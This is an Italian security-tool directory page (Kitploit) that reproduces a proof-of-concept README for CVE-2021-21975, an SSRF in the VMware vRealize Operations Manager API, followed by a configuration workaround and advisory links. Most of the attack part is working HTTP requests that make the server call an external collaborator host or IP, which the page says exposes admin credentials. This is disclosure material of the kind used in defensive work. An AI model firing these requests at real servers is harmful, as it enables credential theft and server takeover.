Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-21975 — [CVE-2021-21975] VMware vRealize Operations Manager API Server Side Request Forgery (SSRF) | Kitploit
Strumenti/GitHubGitHub/murataydemir/cve-2021-21975
RicognizioneAnalisi delle VulnerabilitàExploitRaccolta InformazioniSicurezza WebSicurezza Cloud
GitHubmurataydemir/cve-2021-21975

CVE-2021-21975

[CVE-2021-21975] VMware vRealize Operations Manager API Server Side Request Forgery (SSRF)

Vedi Repository
4335 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

[CVE-2021-21975] VMware vRealize Operations Manager API Server Side Request Forgery (SSRF)


vRealize Operations (vROps) è uno strumento che offre una gestione autonoma delle operazioni IT basata sull'intelligenza artificiale, dalle applicazioni all'infrastruttura, per ottimizzare, pianificare e scalare le distribuzioni VMware Cloud e HCI, unificando al contempo il monitoraggio del cloud pubblico. Le API di VMware vRealize Operations Manager 8.4 e tutte le versioni precedenti sono vulnerabili alla Server Side Request Forgery (SSRF). Lo sfruttamento riuscito di questa vulnerabilità può portare alla lettura o all'aggiornamento di risorse interne e, in questo caso, un attaccante può facilmente sottrarre le credenziali amministrative del server vROps. Combinando CVE-2021-21975 e CVE-2021-21983, un attaccante può eseguire codice arbitrario sul server vRealize Operations remoto.

Prova di concetto (PoC): Per sfruttare questa vulnerabilità, è possibile utilizzare la seguente richiesta:

root@kitploit:~
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 70
Connection: close

[
  "h4mv9d2pleyg06fqvl2o4zif46azyo.burpcollaborator.net/CVE-2021-21975"
]

La risposta alla richiesta precedente è riportata di seguito:

root@kitploit:~
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 20:59:02 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQB
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 151

[
  {
    "address": "h4mv9d2pleyg06fqvl2o4zif46azyo.burpcollaborator.net/CVE-2021-21975",
    "thumbprint": "<html><body>6xal4bz5uui7c8nzvu368ezjlgz</body></html>"
  }
]
Schermata 2021-04-03 alle 01 03 29 Schermata 2021-04-03 alle 01 18 07

Inoltre, le credenziali amministrative vengono esposte nell'header Authorization.

Schermata 2021-04-03 alle 01 19 39 Schermata 2021-04-03 alle 01 24 34

Altre prove di concetto (PoC): Oppure è possibile utilizzare le seguenti richieste per rilevare la vulnerabilità CVE-2021-21975 VMware vRealize Operations Manager API Server Side Request Forgery (SSRF):

root@kitploit:~
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 37
Connection: close

[
  "78.171.203.41:8000/CVE-2021-21975"
]
root@kitploit:~
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 21:00:03 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQE
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 67

[
  {
    "address":"78.171.203.41:8000/CVE-2021-21975",
    "thumbprint":null
  }
]
Schermata 2021-04-03 alle 00 00 20
root@kitploit:~
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 37
Connection: close

[
  "78.171.203.41:8000"
]
root@kitploit:~
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 21:00:39 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQJ
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 52

[
  {
    "address":"78.171.203.41:8000",
    "thumbprint":null
  }
]
Schermata 2021-04-03 alle 00 01 00

Soluzione alternativa: Se non è possibile installare la patch, oppure se non esiste una patch per la propria versione di vRealize Operations, è possibile adottare i seguenti passaggi per aggirare il problema. L'applicazione di questa soluzione alternativa non comporta alcun impatto su vRealize Operations.

Per aggirare questo problema in vRealize Operations, rimuovere una riga di configurazione da casa-security-context.xml

  1. Accedere al nodo primario come root tramite SSH o Console, premendo ALT+F1 in una console per accedere
  2. Aprire /usr/lib/vmware-casa/casa-webapp/webapps/casa/WEB-INF/classes/spring/casa-security-context.xml
  3. Trovare e rimuovere la riga: <sec:http pattern="/nodes/thumbprints" security='none'/>
  4. Salvare e chiudere il file
  5. Riavviare il servizio CaSA con questo comando: service vmware-casa restart
  6. Ripetere i passaggi 1-5 su tutti gli altri nodi del cluster vRealize Operations.

Per maggiori informazioni, visitare le seguenti pagine.

https://kb.vmware.com/s/article/83210
https://www.vmware.com/security/advisories/VMSA-2021-0004.html
https://f5.pm/go-66465.html

Scarica lo strumento